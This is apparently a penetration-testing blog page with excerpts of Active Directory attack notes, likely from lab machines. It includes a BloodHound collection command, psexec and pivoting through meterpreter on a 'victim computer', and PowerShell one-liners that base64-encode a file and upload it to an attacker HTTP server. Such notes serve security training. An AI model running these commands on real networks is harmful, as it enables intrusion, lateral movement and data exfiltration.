>python3 ./bloodhound.py -c ALL -u [ID] -p [PW] -d domain.local -dc dc01.domain.local -ns 10.10.10.192-c means All collection methods, -u means ID, -p means PW, -d means domain name, -dc DC name(can not use IP), -ns means DNS server IP
關於作者
Nelley,乃力。
就是一個村民。
就是一個村民。
相關案例
2022/09/01
進攻是最好的防守
Run the psexec in meterpreter for accessing to 10.130.9.22.By exploring the environment in 10.130.9.22, suddenly found a subnet 10.130.13.119 in the victim computer. So here is the tactic to pivot to the subnet. Interface 6 Name : AWS PV Network Device #1Hardware MAC : 02:ba:b3:20:ec:2cMTU : 9001IPv4 Address : 10.130.13.119IPv4 Netmask : 255.255.255.0IPv6 Address : fe80::f574:c767:4549:475aIPv6 Netmask : ffff:ffff:ffff:ffff:: Interface 8 Name : AWS PV Network Device #0Hardware MAC : 02:66:c3:d8:7b:1aMTU : 9001IPv4 Address : 10.130.9.22IPv4 Netmask : 255.255.255.0IPv6 Address...
2022/10/03
進攻是最好的防守
Upload file via PowerShell >wget https://raw.githubusercontent.com/w0lfram1te/extended-http-server/main/ehttpserver.py python3 ehttpserver.py Python simple http server doesn't support PUT request. We need to use the other one >powershell -c "invoke-webrequest -method PUT -usebasicparsing -uri http://[IP]:[Port]/[FILE] -body (get-content [FILE_Upload])" StatusCode : 201 StatusDescription : Created Content : {} ... Use invoke-webrequest PUT to upload the file to the python server >powershell -c "$Base64String = [System.convert]::ToBase64String((Get-Content -Path 'acls.csv' -Encoding Byte)); invoke-webrequest -method PUT -usebasicparsing -uri http://10.10.16.6:8000/base64.txt -body $Base64String" One liner version with the base64 encoding PowerShell...
